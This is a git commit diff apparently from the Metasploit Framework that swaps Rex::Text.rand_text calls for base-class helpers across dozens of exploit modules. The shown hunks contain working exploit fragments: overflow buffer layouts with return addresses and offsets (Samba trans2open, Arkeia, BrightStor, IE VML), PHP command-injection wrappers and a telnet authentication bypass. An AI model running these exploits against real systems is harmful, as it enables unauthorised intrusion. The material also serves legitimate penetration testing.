updated modules to use base class rand_xxx methods
git-svn-id: file:///home/svn/framework3/trunk@4498 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
Matt Miller
parent
cfd9cbb1f1
commit
d42194e14a
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -74,7 +74,7 @@ class Exploits::Hpux::Lpd::CleanupExec < Msf::Exploit::Remote
|
|||
print_status("Sending our job request with embedded command string...")
|
||||
# Send the job request with the encoded command
|
||||
sock.put(
|
||||
"\x02" + Rex::Text.rand_text_alphanumeric(3) + jid +
|
||||
"\x02" + rand_text_alphanumeric(3) + jid +
|
||||
"`" + payload.encoded + "`\n"
|
||||
)
|
||||
|
||||
|
|
@ -85,7 +85,7 @@ class Exploits::Hpux::Lpd::CleanupExec < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
print_status("Sending our fake control file...")
|
||||
sock.put("\x02 32 cfA" + Rex::Text.rand_text_alphanumeric(8) + "\n")
|
||||
sock.put("\x02 32 cfA" + rand_text_alphanumeric(8) + "\n")
|
||||
res = sock.get_once(1)
|
||||
if (res[0] != 0)
|
||||
print_status("The target did not accept our control file")
|
||||
|
|
@ -95,7 +95,7 @@ class Exploits::Hpux::Lpd::CleanupExec < Msf::Exploit::Remote
|
|||
print_status("Forcing an error and hijacking the cleanup routine...")
|
||||
|
||||
begin
|
||||
sock.put(Rex::Text.rand_text_alphanumeric(16384))
|
||||
sock.put(rand_text_alphanumeric(16384))
|
||||
disconnect
|
||||
rescue
|
||||
end
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -58,7 +58,7 @@ class Exploits::Linux::Http::PeerCast_URL < Msf::Exploit::Remote
|
|||
def exploit
|
||||
connect
|
||||
|
||||
pat = Rex::Text.rand_text_alphanumeric(780)
|
||||
pat = rand_text_alphanumeric(780)
|
||||
pat << [target.ret].pack('V')
|
||||
pat << payload.encoded
|
||||
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -88,7 +88,7 @@ class Exploits::Osx::Afp::AFPLoginExt < Msf::Exploit::Remote
|
|||
}
|
||||
|
||||
# Add the user type and afp path
|
||||
afp << "\x03" + [9].pack('n') + Rex::Text.rand_text_alphanumeric(9)
|
||||
afp << "\x03" + [9].pack('n') + rand_text_alphanumeric(9)
|
||||
afp << "\x03" + [path.length].pack('n') + path
|
||||
|
||||
sock.write(afp)
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -99,7 +99,7 @@ class Exploits::Osx::Arkeia::ArkeiaType77Overflow < Msf::Exploit::Remote
|
|||
head = "\x00\x4d\x00\x03\x00\x01\xff\xff"
|
||||
head[6, 2] = [1200].pack('n')
|
||||
|
||||
buf = Rex::Text.rand_text_english(1200, payload_badchars)
|
||||
buf = rand_text_english(1200, payload_badchars)
|
||||
|
||||
# Return back to the stack either directly or via system lib
|
||||
buf[0, 112] = [target.ret].pack('N') * (112/4)
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -75,9 +75,9 @@ class Exploits::Osx::Browser::Safar_Metadata_Archive < Msf::Exploit::Remote
|
|||
|
||||
def generate_zip(shellcode)
|
||||
tdir = ENV['HOME'] || ENV['TMPDIR'] || '/tmp'
|
||||
tnam = Rex::Text.rand_text_alphanumeric(8)
|
||||
tnam = rand_text_alphanumeric(8)
|
||||
tdir += '/' + tnam
|
||||
tmov = Rex::Text.rand_text_alphanumeric(8) + '.mov'
|
||||
tmov = rand_text_alphanumeric(8) + '.mov'
|
||||
|
||||
FileUtils.mkdir(tdir, :mode => 0755)
|
||||
FileUtils.cd(tdir)
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -96,7 +96,7 @@ class Exploits::Osx::Ftp::WebStarFTPUserOverflow < Msf::Exploit::Remote
|
|||
|
||||
# r1+120 = 408
|
||||
|
||||
buf = Rex::Text.rand_text_alphanumeric(basel + 136 + 56, payload_badchars)
|
||||
buf = rand_text_alphanumeric(basel + 136 + 56, payload_badchars)
|
||||
buf[basel + 24, 4] = [ target['Rets'][0] ].pack('N') # call $r28, jump r1+120
|
||||
buf[basel , 4] = [ target['Rets'][1] ].pack('N') # getgid()
|
||||
buf[basel + 136, 4] = [ target['Rets'][2] ].pack('N') # (r1+120) => r3 = r1 + 64, call $r30
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -78,7 +78,7 @@ class Exploits::Osx::Samba::Trans2Open < Msf::Exploit::Remote
|
|||
smb_login
|
||||
|
||||
# 1988 is required for findrecv shellcode
|
||||
pattern = Rex::Text.rand_text_english(1988)
|
||||
pattern = rand_text_english(1988)
|
||||
|
||||
# This stream covers the framepointer and the return address
|
||||
pattern[1195, 64] = [curr_ret].pack('N') * 16
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -92,7 +92,7 @@ class Exploits::Solaris::Samba::Trans2Open_Overflow < Msf::Exploit::Remote
|
|||
#
|
||||
|
||||
# This value *must* be 1988 to allow findrecv shellcode to work
|
||||
pattern = Rex::Text.rand_text_english(1988)
|
||||
pattern = rand_text_english(1988)
|
||||
|
||||
#
|
||||
# This was tested against sunfreeware samba 2.2.7a / solaris 9 / sun4u
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -69,7 +69,7 @@ class Exploits::Solaris::Sunrpc::SadmindExec < Msf::Exploit::Remote
|
|||
|
||||
if !datastore['HOSTNAME']
|
||||
print_status('attempting to determine hostname')
|
||||
response = sadmind_request(Rex::Text.rand_text_alpha(rand(10) + 1), "true")
|
||||
response = sadmind_request(rand_text_alpha(rand(10) + 1), "true")
|
||||
|
||||
if !response
|
||||
print_error('no response')
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -81,7 +81,7 @@ class Exploits::Solaris::Telnet::TTYPrompt_Auth_Bypass < Msf::Exploit::Remote
|
|||
"\xff\xfa\x27\x00" +
|
||||
"\x00TTYPROMPT" +
|
||||
"\x01" +
|
||||
Rex::Text.rand_text_alphanumeric(6) +
|
||||
rand_text_alphanumeric(6) +
|
||||
"\xff\xf0"
|
||||
|
||||
sock.put(req)
|
||||
|
|
@ -91,7 +91,7 @@ class Exploits::Solaris::Telnet::TTYPrompt_Auth_Bypass < Msf::Exploit::Remote
|
|||
|
||||
req = datastore['USER']
|
||||
64.times {
|
||||
req += Rex::Text.rand_text(rand(10) + 1, '', " \t") + Rex::Text.rand_text_alpha(rand(10) + 1)
|
||||
req += rand_text(rand(10) + 1, '', " \t") + rand_text_alpha(rand(10) + 1)
|
||||
}
|
||||
req += "\n"
|
||||
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -61,7 +61,7 @@ class Exploits::Unix::Misc::DISTCCD_EXEC < Msf::Exploit::Remote
|
|||
distcmd = dist_cmd("sh", "-c", payload.encoded);
|
||||
sock.put(distcmd)
|
||||
|
||||
dtag = Rex::Text.rand_text_alphanumeric(10)
|
||||
dtag = rand_text_alphanumeric(10)
|
||||
sock.put("DOTI0000000A#{dtag}\n")
|
||||
|
||||
res = sock.get_once(24, 5)
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -63,7 +63,7 @@ class Exploits::Unix::Webapp::PhpvBulletinTemplateName < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def go(command)
|
||||
wrapper = Rex::Text.rand_text_alphanumeric(rand(128)+32)
|
||||
wrapper = rand_text_alphanumeric(rand(128)+32)
|
||||
|
||||
command = "echo #{wrapper};#{command};echo #{wrapper};"
|
||||
encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -66,17 +66,17 @@ class Exploits::Unix::Webapp::PhpXmlrpcEval < Msf::Exploit::Remote
|
|||
def go(command)
|
||||
|
||||
encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
|
||||
wrapper = Rex::Text.rand_text_alphanumeric(rand(128)+32)
|
||||
wrapper = rand_text_alphanumeric(rand(128)+32)
|
||||
|
||||
cmd = "echo('#{wrapper}'); passthru(#{ encoded }); echo('#{wrapper}');;"
|
||||
|
||||
xml =
|
||||
'<?xml version="1.0"?>' +
|
||||
"<methodCall>" +
|
||||
"<methodName>"+ Rex::Text.rand_text_alphanumeric(rand(128)+32) + "</methodName>" +
|
||||
"<methodName>"+ rand_text_alphanumeric(rand(128)+32) + "</methodName>" +
|
||||
"<params><param>" +
|
||||
"<name>" + Rex::Text.rand_text_alphanumeric(rand(128)+32) + "');#{cmd}//</name>" +
|
||||
"<value>" + Rex::Text.rand_text_alphanumeric(rand(128)+32) + "</value>" +
|
||||
"<name>" + rand_text_alphanumeric(rand(128)+32) + "');#{cmd}//</name>" +
|
||||
"<value>" + rand_text_alphanumeric(rand(128)+32) + "</value>" +
|
||||
"</param></params>" +
|
||||
"</methodCall>";
|
||||
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -70,18 +70,18 @@ class Exploits::Windows::Antivirus::Symantec_Rtvscan < Msf::Exploit::Remote
|
|||
header << "\x00\x24\x00\x14\xb7\xc9\xd2\xd9"
|
||||
header << "\x3e\x33\xef\x34\x25\x1f\x43\x00"
|
||||
|
||||
crufta = Rex::Text.rand_text_alphanumeric(512)
|
||||
cruftb = Rex::Text.rand_text_alphanumeric(514)
|
||||
cruftc = payload.encoded + Rex::Text.rand_text_alphanumeric(513 - payload.encoded.length)
|
||||
cruftd = Rex::Text.rand_text_alphanumeric(495)
|
||||
crufta = rand_text_alphanumeric(512)
|
||||
cruftb = rand_text_alphanumeric(514)
|
||||
cruftc = payload.encoded + rand_text_alphanumeric(513 - payload.encoded.length)
|
||||
cruftd = rand_text_alphanumeric(495)
|
||||
|
||||
cruftd[479, 2] = "\xeb\x06"
|
||||
cruftd[483, 4] = [target.ret].pack('V')
|
||||
cruftd[487, 5] = [0xe8, -1000].pack('CV')
|
||||
|
||||
cruftd << Rex::Text.rand_text_alphanumeric(21)
|
||||
crufte = Rex::Text.rand_text_alphanumeric(6) + "\x19\x00\x00\x00"
|
||||
crufte << Rex::Text.rand_text_alphanumeric(504) + "\x00\x00"
|
||||
cruftd << rand_text_alphanumeric(21)
|
||||
crufte = rand_text_alphanumeric(6) + "\x19\x00\x00\x00"
|
||||
crufte << rand_text_alphanumeric(504) + "\x00\x00"
|
||||
|
||||
overflow = [ crufta.length ].pack('v') + crufta
|
||||
overflow << [ cruftb.length ].pack('v') + cruftb
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -113,7 +113,7 @@ class Exploits::Windows::Arkeia::ArkeiaType77Overflow < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def prep_ark5
|
||||
data = Rex::Text.rand_text_english(4096, payload_badchars)
|
||||
data = rand_text_english(4096, payload_badchars)
|
||||
data[1176, 4] = [target['Rets'][0]].pack('V')
|
||||
data[1172, 2] = "\xeb\xf9"
|
||||
data[1167, 5] = "\xe98" + [-1172].pack('V')
|
||||
|
|
@ -121,7 +121,7 @@ class Exploits::Windows::Arkeia::ArkeiaType77Overflow < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def prep_ark4
|
||||
data = Rex::Text.rand_text_english(4096, payload_badchars)
|
||||
data = rand_text_english(4096, payload_badchars)
|
||||
seh = generate_seh_payload( target['Rets'][0] )
|
||||
data[ 96, seh.length] = seh
|
||||
end
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -100,7 +100,7 @@ class Exploits::Windows::Backupexec::BackupExecAgentOverflow < Msf::Exploit::Rem
|
|||
resp = ndmp_recv()
|
||||
|
||||
username = 'X' * 512
|
||||
password = Rex::Text.rand_text_alphanumeric(8192)
|
||||
password = rand_text_alphanumeric(8192)
|
||||
|
||||
# Place our payload early in the request and jump backwards into it
|
||||
password[ 3536 - payload.encoded.length, payload.encoded.length] = payload.encoded
|
||||
|
|
|
|||
|
|
@ -110,7 +110,7 @@ class Exploits::Windows::Brightstor::BrightstorDiscoTcp < Msf::Exploit::Remote
|
|||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
buf = Rex::Text.rand_text_english(4096)
|
||||
buf = rand_text_english(4096)
|
||||
|
||||
# Overwriting the return address works well, but the only register
|
||||
# pointing back to our code is 'esp'. The following stub overwrites
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -95,7 +95,7 @@ class Exploits::Windows::Brightstor::BrightstorSQLAgentOverflow < Msf::Exploit::
|
|||
# 3168 == return address
|
||||
# 3172 == esp @ 0293ff8c (2476 from good data)
|
||||
|
||||
buf = Rex::Text.rand_text_english(3288, payload_badchars)
|
||||
buf = rand_text_english(3288, payload_badchars)
|
||||
buf[ 696, payload.encoded.length ] = payload.encoded
|
||||
buf[3168, 4] = [target.ret].pack('V') # jmp esp
|
||||
buf[3172, 5] = "\xe9\x4f\xf6\xff\xff" # jmp -2476
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -96,11 +96,11 @@ class Exploits::Windows::Browser::IE_CreateObject < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
# Build out the HTML response page
|
||||
var_html = Rex::Text.rand_text_alpha(rand(30)+2)
|
||||
var_func_exploit = Rex::Text.rand_text_alpha(rand(30)+2);
|
||||
var_func_go = Rex::Text.rand_text_alpha(rand(30)+2);
|
||||
var_func_createo = Rex::Text.rand_text_alpha(rand(30)+2);
|
||||
var_exe_name = Rex::Text.rand_text_alpha(rand(30)+2);
|
||||
var_html = rand_text_alpha(rand(30)+2)
|
||||
var_func_exploit = rand_text_alpha(rand(30)+2);
|
||||
var_func_go = rand_text_alpha(rand(30)+2);
|
||||
var_func_createo = rand_text_alpha(rand(30)+2);
|
||||
var_exe_name = rand_text_alpha(rand(30)+2);
|
||||
var_objects = ''
|
||||
|
||||
# Build the object list based on target selection
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -61,7 +61,7 @@ class Exploits::Windows::Browser::IE_IsComponentInstalled < Msf::Exploit::Remote
|
|||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
||||
# Create the overflow string
|
||||
pattern = Rex::Text.rand_text_alpha(8192)
|
||||
pattern = rand_text_alpha(8192)
|
||||
|
||||
# Smash the return address with a bogus pointer
|
||||
pattern[744, 4] = [0xffffffff].pack('V')
|
||||
|
|
@ -72,8 +72,8 @@ class Exploits::Windows::Browser::IE_IsComponentInstalled < Msf::Exploit::Remote
|
|||
|
||||
|
||||
# Build out the HTML response page
|
||||
var_client = Rex::Text.rand_text_alpha(rand(30)+2)
|
||||
var_html = Rex::Text.rand_text_alpha(rand(30)+2)
|
||||
var_client = rand_text_alpha(rand(30)+2)
|
||||
var_html = rand_text_alpha(rand(30)+2)
|
||||
|
||||
content = %Q|
|
||||
<html >
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -89,18 +89,18 @@ class Exploits::Windows::Browser::McAfeeMcSubMgrVsprintf < Msf::Exploit::Remote
|
|||
|
||||
# Build out our overflow buffer
|
||||
buf =
|
||||
Rex::Text.rand_text(2972, payload_badchars) +
|
||||
rand_text(2972, payload_badchars) +
|
||||
[ ret ].pack('V') +
|
||||
"\x60" + # pusha
|
||||
"\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte 0x1
|
||||
"\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte 0x1
|
||||
"\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte 0x1
|
||||
"\x6a" + rand_char(payload_badchars) + # push byte 0x1
|
||||
"\x6a" + rand_char(payload_badchars) + # push byte 0x1
|
||||
"\x6a" + rand_char(payload_badchars) + # push byte 0x1
|
||||
"\x61" + # popa
|
||||
p.encoded
|
||||
|
||||
# Generate random variable names
|
||||
vname = Rex::Text.rand_text_alpha(rand(100) + 1)
|
||||
strname = Rex::Text.rand_text_alpha(rand(100) + 1)
|
||||
vname = rand_text_alpha(rand(100) + 1)
|
||||
strname = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
# Build out the message
|
||||
content =
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -66,7 +66,7 @@ class Exploits::Windows::Browser::Mirc_Irc_Url < Msf::Exploit::Remote
|
|||
# Re-generate the payload
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
||||
filler = Rex::Text.rand_text_alphanumeric(target['Offset'], payload_badchars)
|
||||
filler = rand_text_alphanumeric(target['Offset'], payload_badchars)
|
||||
seh = generate_seh_payload(target.ret)
|
||||
sploit = filler + seh
|
||||
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -98,7 +98,7 @@ class Exploits::Windows::Browser::MS03_020_Ie_ObjectType < Msf::Exploit::Remote
|
|||
content =
|
||||
"<html>" + egg + egg + p.encoded + "\n" +
|
||||
"<object type=\"////////////////////////////////////////////////////////////////" +
|
||||
Rex::Text.rand_text_alphanumeric(8) + ret + clean +
|
||||
rand_text_alphanumeric(8) + ret + clean +
|
||||
make_nops(8) + hunter[0] + "\">" +
|
||||
"</object>" +
|
||||
"</html>"
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -89,7 +89,7 @@ class Exploits::Windows::Browser::MS06_001_WMF_SETABORTPROC < Msf::Exploit::Remo
|
|||
html =
|
||||
"<html><meta http-equiv='refresh' content='0; URL=" +
|
||||
get_resource + '/' +
|
||||
Rex::Text.rand_text_alphanumeric(rand(80)+16) +
|
||||
rand_text_alphanumeric(rand(80)+16) +
|
||||
".#{ext}'><body>One second please...</body></html>"
|
||||
send_response_html(cli, html)
|
||||
return
|
||||
|
|
@ -178,7 +178,7 @@ class Exploits::Windows::Browser::MS06_001_WMF_SETABORTPROC < Msf::Exploit::Remo
|
|||
#
|
||||
# Some extra fun padding
|
||||
#
|
||||
Rex::Text.rand_text(rand(16384)+1024)
|
||||
rand_text(rand(16384)+1024)
|
||||
|
||||
return data
|
||||
|
||||
|
|
@ -190,13 +190,13 @@ class Exploits::Windows::Browser::MS06_001_WMF_SETABORTPROC < Msf::Exploit::Remo
|
|||
case type
|
||||
when 0
|
||||
# CreatePenIndirect
|
||||
return [8, 0x02fa].pack('Vv') + Rex::Text.rand_text(10)
|
||||
return [8, 0x02fa].pack('Vv') + rand_text(10)
|
||||
when 1
|
||||
# CreateBrushIndirect
|
||||
return [7, 0x02fc].pack('Vv') + Rex::Text.rand_text(8)
|
||||
return [7, 0x02fc].pack('Vv') + rand_text(8)
|
||||
else
|
||||
# Rectangle
|
||||
return [7, 0x041b].pack('Vv') + Rex::Text.rand_text(8)
|
||||
return [7, 0x041b].pack('Vv') + rand_text(8)
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -84,24 +84,24 @@ class Exploits::Windows::Browser::MS06_013_CreateTextRange < Msf::Exploit::Remot
|
|||
nops = Rex::Text.to_unescape(make_nops(4))
|
||||
|
||||
# Generate a random XML namespace for VML
|
||||
xmlns = Rex::Text.rand_text_alpha(rand(30)+2)
|
||||
xmlns = rand_text_alpha(rand(30)+2)
|
||||
|
||||
# Randomize the javascript variable names
|
||||
rnd = rand(3)
|
||||
var_inputtype = ((rnd == 0) ? "checkbox" : ((rnd == 1) ? "radio" : "image"))
|
||||
var_inp = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
||||
var_tmp = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
||||
var_payload = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
||||
var_nopslide = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
||||
var_slidesize = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
||||
var_fillblock = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
||||
var_memblock = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
||||
var_heap = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
||||
var_index = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
||||
var_maxIndex = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
||||
var_fillHeap = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
||||
var_start = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
||||
var_timer = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
||||
var_inp = "_"+rand_text_alpha(rand(6)+3)
|
||||
var_tmp = "_"+rand_text_alpha(rand(6)+3)
|
||||
var_payload = "_"+rand_text_alpha(rand(6)+3)
|
||||
var_nopslide = "_"+rand_text_alpha(rand(6)+3)
|
||||
var_slidesize = "_"+rand_text_alpha(rand(6)+3)
|
||||
var_fillblock = "_"+rand_text_alpha(rand(6)+3)
|
||||
var_memblock = "_"+rand_text_alpha(rand(6)+3)
|
||||
var_heap = "_"+rand_text_alpha(rand(6)+3)
|
||||
var_index = "_"+rand_text_alpha(rand(6)+3)
|
||||
var_maxIndex = "_"+rand_text_alpha(rand(6)+3)
|
||||
var_fillHeap = "_"+rand_text_alpha(rand(6)+3)
|
||||
var_start = "_"+rand_text_alpha(rand(6)+3)
|
||||
var_timer = "_"+rand_text_alpha(rand(6)+3)
|
||||
rnd = rand(2)
|
||||
var_setTimeout = (rnd == 0) ? "setTimeout('#{var_fillHeap}()', 5)" : ""
|
||||
var_setInterval = (rnd == 1) ? "setInterval('#{var_fillHeap}()', 5)" : ""
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -85,14 +85,14 @@ class Exploits::Windows::Browser::MS06_055_VML_Overflow < Msf::Exploit::Remote
|
|||
buffer = ("&#x" + addr_word + ";") * buflen
|
||||
|
||||
# Generate a random XML namespace for VML
|
||||
xmlns = Rex::Text.rand_text_alpha(rand(30)+2)
|
||||
xmlns = rand_text_alpha(rand(30)+2)
|
||||
|
||||
# Randomize the javascript variable names
|
||||
var_buffer = Rex::Text.rand_text_alpha(rand(30)+2)
|
||||
var_shellcode = Rex::Text.rand_text_alpha(rand(30)+2)
|
||||
var_unescape = Rex::Text.rand_text_alpha(rand(30)+2)
|
||||
var_x = Rex::Text.rand_text_alpha(rand(30)+2)
|
||||
var_i = Rex::Text.rand_text_alpha(rand(30)+2)
|
||||
var_buffer = rand_text_alpha(rand(30)+2)
|
||||
var_shellcode = rand_text_alpha(rand(30)+2)
|
||||
var_unescape = rand_text_alpha(rand(30)+2)
|
||||
var_x = rand_text_alpha(rand(30)+2)
|
||||
var_i = rand_text_alpha(rand(30)+2)
|
||||
|
||||
# Build out the message
|
||||
content = %Q|
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -70,16 +70,16 @@ class Exploits::Windows::Browser::MS06_057_WebView_SetSlice < Msf::Exploit::Remo
|
|||
addr_word = [target.ret].pack('V').unpack('H*')[0][0,4]
|
||||
|
||||
# Randomize the javascript variable names
|
||||
var_buffer = Rex::Text.rand_text_alpha(rand(30)+2)
|
||||
var_shellcode = Rex::Text.rand_text_alpha(rand(30)+2)
|
||||
var_unescape = Rex::Text.rand_text_alpha(rand(30)+2)
|
||||
var_x = Rex::Text.rand_text_alpha(rand(30)+2)
|
||||
var_i = Rex::Text.rand_text_alpha(rand(30)+2)
|
||||
var_tic = Rex::Text.rand_text_alpha(rand(30)+2)
|
||||
var_toc = Rex::Text.rand_text_alpha(rand(30)+2)
|
||||
var_buffer = rand_text_alpha(rand(30)+2)
|
||||
var_shellcode = rand_text_alpha(rand(30)+2)
|
||||
var_unescape = rand_text_alpha(rand(30)+2)
|
||||
var_x = rand_text_alpha(rand(30)+2)
|
||||
var_i = rand_text_alpha(rand(30)+2)
|
||||
var_tic = rand_text_alpha(rand(30)+2)
|
||||
var_toc = rand_text_alpha(rand(30)+2)
|
||||
|
||||
# Randomize HTML data
|
||||
html = Rex::Text.rand_text_alpha(rand(30)+2)
|
||||
html = rand_text_alpha(rand(30)+2)
|
||||
|
||||
# Build out the message
|
||||
content = %Q|
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -93,7 +93,7 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
|
|||
"<script>" +
|
||||
"document.location='" +
|
||||
get_resource + '/' +
|
||||
Rex::Text.rand_text_alphanumeric(rand(80)+16) +
|
||||
rand_text_alphanumeric(rand(80)+16) +
|
||||
".pls'</script>" +
|
||||
"One second please...</body></html>"
|
||||
send_response_html(cli, html)
|
||||
|
|
@ -115,7 +115,7 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
|
|||
|
||||
pcnt = rand(10)+10;
|
||||
|
||||
file = Rex::Text.rand_text_english(1026)
|
||||
file = rand_text_english(1026)
|
||||
file[1022 , 4] = [target.ret].pack('V')
|
||||
file[0, payload.encoded.length] = payload.encoded
|
||||
|
||||
|
|
@ -130,7 +130,7 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
|
|||
|
||||
def generate_space
|
||||
if datastore['PlaylistSpaceInjection'] == true
|
||||
return Rex::Text.rand_text(rand(100)+1, nil, " \t")
|
||||
return rand_text(rand(100)+1, nil, " \t")
|
||||
else
|
||||
return ''
|
||||
end
|
||||
|
|
@ -138,7 +138,7 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
|
|||
|
||||
def generate_song(id, file)
|
||||
return generate_line("File#{id}", file) +
|
||||
generate_line("Title#{id}", Rex::Text.rand_text_alphanumeric(rand(64)+1)) +
|
||||
generate_line("Title#{id}", rand_text_alphanumeric(rand(64)+1)) +
|
||||
generate_line("Length#{id}", "%x" % (rand(1024) + 30))
|
||||
end
|
||||
|
||||
|
|
@ -149,7 +149,7 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
|
|||
def generate_songs(cnt)
|
||||
songs = ''
|
||||
1.upto(cnt) do |i|
|
||||
songs << generate_song(i, Rex::Text.rand_text_alphanumeric(rand(64)+1))
|
||||
songs << generate_song(i, rand_text_alphanumeric(rand(64)+1))
|
||||
end
|
||||
return songs
|
||||
end
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -66,10 +66,10 @@ class Exploits::Windows::Browser::Xmplay_Asx < Msf::Exploit::Remote
|
|||
# Re-generate the payload
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
||||
drv = Rex::Text.rand_text_alpha_upper(1)
|
||||
ext = Rex::Text.rand_text_alpha_upper(3)
|
||||
drv = rand_text_alpha_upper(1)
|
||||
ext = rand_text_alpha_upper(3)
|
||||
|
||||
